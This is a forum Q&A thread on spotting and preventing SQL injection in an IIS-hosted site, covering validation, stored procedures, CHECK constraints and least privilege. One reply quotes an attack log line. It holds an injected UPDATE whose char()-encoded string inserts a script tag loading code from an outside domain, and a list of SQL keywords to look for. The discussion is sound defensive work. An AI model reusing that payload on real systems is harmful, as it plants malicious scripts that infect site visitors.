[Webinar] Learn how to a build a cloud-first strategyRegister Now

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 199
  • Last Modified:

sql injection

I have the following line of code in my iis log files.  does this explain how they hacked my database,  how do i stop them form adding code to my db fields.

this is the line in my iis log:
Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
0
bmanmike39
Asked:
bmanmike39
  • 5
  • 4
  • 3
  • +2
1 Solution
 
käµfm³d 👽Commented:
how do i stop them form adding code to my db fields.
VALIDATE all data that can come from a user. This includes input controls (e.g. text boxes, drop-down lists, etc.) as well as query strings. You should never trust any input from a user.

You would typically favor parameterized queries and/or stored procedures over concatenated SQL strings. Concatenation and unvalidated data embody the #1 vector for injection attacks. Parameterized queries are no substitute for input validation.
0
 
jogosCommented:
As in your other question. You can prevent them to change your database by not allow the login (sqluser) used for your website to do DDL-commands.
http://msdn.microsoft.com/en-us/library/ms189121.aspx
http://www.techrepublic.com/article/understanding-roles-in-sql-server-security/1061781

The line you gave is what it says: the explenation of which fields are in the IIS log.
0
Get free NFR key for Veeam Availability Suite 9.5

Veeam is happy to provide a free NFR license (1 year, 2 sockets) to all certified IT Pros. The license allows for the non-production use of Veeam Availability Suite v9.5 in your home lab, without any feature limitations. It works for both VMware and Hyper-V environments

 
Racim BOUDJAKDJIDatabase Architect - Dba - Data ScientistCommented:
<< how do i stop them form adding code to my db fields.>>
Well for one, do not give ddladmin priviledges to the IIS App.  Second, put everything into stored procedures on which you can control more tightly security.  After that, do what kaufmed suggested : set up CHECK constraints to validate what data is expected, as opposed to anything.
0
 
Racim BOUDJAKDJIDatabase Architect - Dba - Data ScientistCommented:
This is a security issue more than an application issue.
0
 
käµfm³d 👽Commented:
This is a security issue more than an application issue.
I disagree. Both are equally important. Even if you lock down the database, if you don't validate what you are passing via the app, it could still be possible to steal other users' information. There are schools of thought that say the DB should be responsible for checking data; there are also those that say validation should solely be left to the application. Depending on which school you fall into, the issue could go either way.
0
 
Racim BOUDJAKDJIDatabase Architect - Dba - Data ScientistCommented:
<<Even if you lock down the database, if you don't validate what you are passing via the app, it could still be possible to steal other users' information. >>
Proper access control associated with security policy insures traceability, it is perfectly possible to reduce SQL injections to a minimum, especially by using integrated security.  Having the application handle security is simply a recipe for disaster: logins/passwords running around in pages of code, keeping traceability becoming a nightmare...

<<There are schools of thought that say the DB should be responsible for checking data; there are also those that say validation should solely be left to the application. >>
I would not call recoding a the entire database constraining system for each new application another school of thought.  Just a more ineffective way of doing the same thing.  Server side declarative DDL constraints are known to be a much more efficient since they are DDL and table based.  

But I guess some people focus onto building bridges while others prefer to divert rivers.
0
 
käµfm³d 👽Commented:
Perhaps my comment gave the wrong impression. I was not solely referring to table modifications--I should have made that more clear. I was referring to SQL Injection in a general sense. If a text box on a page is permitted to contain an unlimited number of characters, and the data goes unverified, what is to stop a malicious user from injecting SQL to read other users' data? How would you enforce this on the database since the DB is essentially just an interpreter?
0
 
jogosCommented:
The question here is 'how can I see it in the IIS-log' not how can I prevent it.

You wil have to loock for sql keywords like DECLARE, EXEC, SELECT, INSERT, UPDATE, DELETE, DROP, VARCHAR (and yes you read that before).

From the link I gave in other question http://stackoverflow.com/questions/3772793/has-anyone-found-out-how-this-was-done-sql-injection 
An update command is added to a dealer_guid

2010-09-23 10:30:16 W3SVC1302398943 DM100 192.168.12.10 GET /search/List.cfm D_Dealer_GUID=3f8722ff-6f72-4530-a953-09c39dd389601'+update+q_ntd+set+Body=cast(Body+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(52)%2Bchar(57)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - 77.78.239.56 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:

On this link you find examples that are less obvious to be harmfull, but the DECLARE and EXEC are the
things that are clear the other
http://www.authorstream.com/Presentation/fstuck-247209-overview-sql-injection-attack-security-iis-web-microsoft-server-science-technology-ppt-powerpoint/

And when also the how to prevent has to be covered, on the second link 'Eyal' has given I can add a link for common regular expressions http://www.symantec.com/connect/articles/detection-sql-injection-and-cross-site-scripting-attacks.  
0
 
käµfm³d 👽Commented:
The question here is 'how can I see it in the IIS-log' not how can I prevent it.
Hmmm...   I read, "how do i stop them form adding code to my db fields."
0
 
jogosCommented:
@kaufmed
OK. But that part bmanmike39 has another question open 'how do I prevent'. So it was more like a message to the author to keep both with a separate goal.
0
 
Racim BOUDJAKDJIDatabase Architect - Dba - Data ScientistCommented:
<< If a text box on a page is permitted to contain an unlimited number of characters, and the data goes unverified, what is to stop a malicious user from injecting SQL to read other users' data>>
How about a CHECK constraint ?  People use CHECK constraints everywhere to validate user input according to format (you can reject any wrong text length, pattern), data expected, duplicates and return a code to the presentation layer. Unexpected data server rejection coupled with tight integrated security makes SQL injection very difficult.  SQL injection is often a consequence of non existing applicative side user input control associated withe increased surface of exposition.

<<How would you enforce this on the database since the DB is essentially just an interpreter?>>
Answered above.  I do not understand what you mean by interpreter.

A database insures to developers a mean to encode facts and rules for making this data reliable and expected in a declarative way as opposed to pouring down tons of ineffective procedural code to do that.
0
 
käµfm³d 👽Commented:
@Racimo
Then I concede. Thanks for clearing that up  = )
0
 
bmanmike39Author Commented:
Thanks
0

Featured Post

Efficient way to get backups off site to Azure

This user guide provides instructions on how to deploy and configure both a StoneFly Scale Out NAS Enterprise Cloud Drive virtual machine and Veeam Cloud Connect in the Microsoft Azure Cloud.

  • 5
  • 4
  • 3
  • +2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now